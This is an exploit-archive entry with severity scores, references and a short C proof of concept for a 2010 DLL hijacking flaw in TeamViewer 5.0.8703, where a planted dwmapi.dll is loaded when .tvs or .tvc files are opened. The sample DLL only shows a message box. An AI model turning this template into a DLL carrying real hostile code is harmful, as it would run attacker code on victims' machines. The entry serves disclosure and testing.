TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)

2010.08.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* Exploit Title: TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll) Date: August 25, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: Latest TeamViewer 5.0.8703 Tested on: Windows XP SP3 En Vulnerable extensions: .tvs .tvc Greetz: Astalavista, OffSEC, Exploit-DB */ #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK); return 0; }

References:

http://www.vupen.com/english/advisories/2010/2174
http://www.securityfocus.com/archive/1/archive/1/513317/100/0/threaded
http://www.exploit-db.com/exploits/14734
http://secunia.com/advisories/41112


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top